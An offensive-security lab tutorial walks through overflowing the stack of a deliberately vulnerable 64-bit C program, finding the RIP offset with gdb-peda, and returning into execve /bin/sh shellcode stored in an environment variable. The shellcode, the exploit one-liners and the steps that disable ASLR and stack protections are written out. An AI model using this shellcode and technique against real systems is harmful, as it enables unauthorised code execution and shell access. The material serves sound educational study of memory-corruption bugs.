# 64-bit Stack-based Buffer Overflow

## 64-bit Stack-based Buffer Overflow

The purpose of this lab is to understand how to get control of the RIP register when dealing with classic stack-based buffer overflow vulnerabilities in 64-bit Linux programs.

This lab is based on a great post <https://blog.techorganic.com/2015/04/10/64-bit-linux-stack-smashing-tutorial-part-1/>.

{% hint style="info" %}
Note that the vulnerable program used in this lab was compiled without memory protections deliberately and similarly, the ASLR was disabled.
{% endhint %}

### Useful notes

For a more detailed overview of the stack based overflow exploitation:

{% content-ref url="32-bit-stack-based-buffer-overflow" %}
[32-bit-stack-based-buffer-overflow](https://hamcodes.gitbook.io/hackersnotes/offensive-security/code-and-process-injection/binary-exploitation/32-bit-stack-based-buffer-overflow)
{% endcontent-ref %}

For more information about the stack memory layout and calling convention for 64-bit Linux programs:

{% content-ref url="64-bit-stack-based-buffer-overflow" %}
[64-bit-stack-based-buffer-overflow](https://hamcodes.gitbook.io/hackersnotes/offensive-security/code-and-process-injection/binary-exploitation/64-bit-stack-based-buffer-overflow)
{% endcontent-ref %}

### Vulnerable Code

In this lab, we will be using the below vulnerable program, which declares a buffer `buf` of 80 bytes, but then allows writing 400 bytes to it, which when done, will overwrite stack's contents, specifically, the RBP and the return address, which can and will be exploited in this lab:

{% tabs %}
{% tab title="vulnerable.c" %}

```c
// code from https://blog.techorganic.com/2015/04/10/64-bit-linux-stack-smashing-tutorial-part-1/

#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}
```

{% endtab %}
{% endtabs %}

{% hint style="info" %}
**Remember about the stack**

* Stack grows downwards
* Local variables are defined at lower stack addresses
* Return address is located higher up in the stack, compared to local variables
  {% endhint %}

We can compile the above code with:

```python
gcc -fno-stack-protector -z execstack vulnerable.c -o vulnerable
```

{% hint style="warning" %}
Don't forget to disable the ASLR:

```
echo 0 > /proc/sys/kernel/randomize_va_space
```

{% endhint %}

### Getting Control of RIP

Let's try to overflow the program's `buf` buffer by sending some garbage data to it. First of, let's generate the said garbage data - 200 AAAAs:

```python
python -c "print 'A'*200" > in.bin
```

Let's now run the vulnerable program, feed the garbage file to it and observe the program crash:

```python
gdb vulnerable
r < in.bin
```

![Vulnerable program crashes when the garbage is fed to it, but the RIP is not overwritten](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-M_lvHt17_yqem7x7Ggn%2F-M_oinfE5jsfdVkSuLTE%2Fimage.png?alt=media\&token=186b39b5-d3fc-480f-a6fd-3f3f7891f91c)

Note from the above screenshot the following key points:

* The stack has been overflowed with As (lime);
* RIP register (red) has not been overflowed although it would have been, had this been a 32-bit binary. On the same note, we can indeed see that the return address (RSP + 0 as `ret` instruction would pop this value and jump to it) has been filled with `AAAA...`s, so why are we not in control of the RIP register?

#### Why is RIP not overflowed?

The reason the RIP was not overflowed (technically it was, as we saw in the above screenshot, but there's more to it), is because the `AAAAAAAA` (`0x4141414141414141`) is considered a non-canonical memory address, or, in other words, `0x4141414141414141` is a 64-bit wide address and current CPUs prevent applications and OSes to use 64-bit wide addresses.

Instead, the highest memory addresses programs can use are 48-bit wide addresses and they are capped to `0x00007FFFFFFFFFFF`. This is done to prevent the unnecessary complexity in memory address translations that would not provide much benefit to the OSes or applications as it's very unlikely they would ever need to use all of that 64-bit address space.

#### Finding RIP Offset

Knowing about canonical addresses, we could take control of the RIP if the 64-bit wide return address `0x4141414141414141` (our garbage data) we tried to plant into the vulnerable program's stack, was translated to a 48-bit canonical address by masking off the 2 highest bytes:

```python
// WinDBG
0:000> ? 0x4141414141414141 & 0x00007FFFFFFFFFFF
Evaluate expression: 71748523475265 = 00004141`41414141
```

Making our garbage return address a valid canonical address (note the 2 leading bytes are `00 00`):

$$
0x0000414141414141
$$

Let's see if we can make the program crash and point the RIP to the now canonical memory address `0x0000414141414141`.

Before we can do this, we need to find out how much garbage `AAA..` we need to send in to the vulnerable program before we can place `0x0000414141414141` onto the stack, so that we can take over the RIP.

In gdb-peda, let's create a pattern of 200 characters:

```python
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
```

Feed that pattern to the vulnerable program, observe the crash, and find the offset where we should place our preferred RIP value (`0x0000414141414141`):

![RIP offset is 104](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-M_kSzmEh8OnVSjGXVBE%2F-M_l_2jiCTrJssyHeZVJ%2Fimage.png?alt=media\&token=85f3efca-a506-4d58-8a48-8d291afb3a55)

From the above screenshot, we can see that part of our pattern `A7AAMAAiA...` is visible at the top of the stack - this value would be popped from the stack and jumped to by the `ret` instruction. Now we need to know how many characters of the 200 bytes pattern that we generated earlier were put on the stack, before `A7AAMAAiA` got placed at the top of the stack.

Below screenshot illustrates the point outlined above:

* 200 characters pattern string
* In red, 104 bytes of garbage characters
* In cyan, the `A7AAMAAiA` - this is where we would place our arbitrary RIP value

![104 bytes of garbage before we can place an arbitrary RIP value on the stack](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-M_lvHt17_yqem7x7Ggn%2F-M_onJ1YSxs66k7SNBD9%2Fimage.png?alt=media\&token=df3c2390-647f-48f8-9437-3fec26b7252f)

To calculate the offset in gdb-peda, we can use `pattern_offset` like so:

```python
gdb-peda$ pattern_offset A7AAMAAiA
A7AAMAAiA found at offset: 104
```

#### RIP is Under Control

The RIP offset as we've just identified is `104`. Let's test it by generating a new garbage file that will now contain 104 `A` and a canonical return address `0x0000414141414141` (in reverse due to little-endianness):

```python
python -c "print 'A'*104 + '\x41\x41\x41\x41\x41\x41\x00\x00'" > in.bin
```

Sending this data to the vulnerable program reveals that we have now taken control of the RIP register (lime):

![We can now control RIP as it points to 0x0000414141414141](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-M_kSzmEh8OnVSjGXVBE%2F-M_lbBt0j1o7TTG4RaTL%2Fimage.png?alt=media\&token=d11de460-28a4-4b92-a746-0923080cbff3)

### Exploitation

We'd like the vulnerable program to spawn a shell for us when exploited, so we will place the [shellcode](http://shell-storm.org/shellcode/files/shellcode-806.php) in the environment variable `PWN`, so it ends up in the vulnerable program's stack when it's executed, like so:

```python
export PWN=`python -c 'print "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"'`
```

{% hint style="info" %}
Note that if you are trying to replicate this in your lab and you would like the vulnerable program to spawn a root shell, you need to use the [shellcode](http://shell-storm.org/shellcode/files/shellcode-77.php) that calls `setuid(0)` first. Thanks [@reveng007](https://twitter.com/reveng007).
{% endhint %}

We now need to find where on stack the `PWN` environment variable will be located in the vulnerable program. For this, we can use the following program:

{% tabs %}
{% tab title="getenvvar.c" %}

```cpp
// code by Jon Erickson, page 147 and 148 of Hacking: The Art of Exploitation, 2nd Edition

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);
}
```

{% endtab %}
{% endtabs %}

Compile it with:

```
gcc getenvvar.c -o getenvvar
```

Then run it like so:

```python
./getenvvar PWN ./vulnerable
```

Note that the `PWN` environment variable will be on the vulnerable program's stack at `0x7fffffffefa8`:

![PWN environment variable location on the stack in the vulnerable program](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-M_kSzmEh8OnVSjGXVBE%2F-M_lfon_weniLYbz5jtm%2Fimage.png?alt=media\&token=e50a5146-d5d5-4e91-b9e6-2a352ac10f73)

Convert `0x7fffffffefa8` to its canonical (2 highest bytes masked off) form, which equals to `0x0000ffffefa8`. We can now try to exploit the vulnerable program by sending the garbage data that now includes the `PWN` environment variable address (that contains the shellcode that spawns a shell) as the return address at offset 104, like so:

```python
(python -c "print 'A'*104 + '\xa8\xef\xff\xff\xff\x7f\x00\x00'"; cat) | ./vulnerable
```

![Vulnerable program is exploited and results in a new shell](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-M_kSzmEh8OnVSjGXVBE%2F-M_lhvd9FICk2p5fB5fS%2Fx64-stack-overflow.gif?alt=media\&token=e9671087-3fa2-4c04-8a30-530549ff8ae0)

To confirm the exploit worked as expected, we can `unset` the `PWN` environment variable and try to exploit the program again just to see the program crash, since it no longer knows what shellcode to execute:

![Exploit no longer works since shellcode is gone from the PWN environment variable](https://386337598-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LFEMnER3fywgFHoroYn%2F-M_liy0xN0Oi7SWDA0ND%2F-M_ljsK7ntFeuGpvY9mQ%2Fimage.png?alt=media\&token=d9075085-c985-408e-97f3-08b5e3c58547)

### References

{% embed url="<https://blog.techorganic.com/2015/04/10/64-bit-linux-stack-smashing-tutorial-part-1/>" %}

{% embed url="<https://medium.com/@_neerajpal/explained-difference-between-x86-x64-disassembly-49e9678e1ae2>" %}

{% file src="<https://55426363-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FpkdwDJIuvdv3ukF6DFYY%2Fuploads%2FeXL0ohmHxttOnk2PaBQx%2Fx64_cheatsheet.pdf?alt=media&token=72e30509-b624-4dbf-b4a3-e6c1fe4c0dcf>" %}
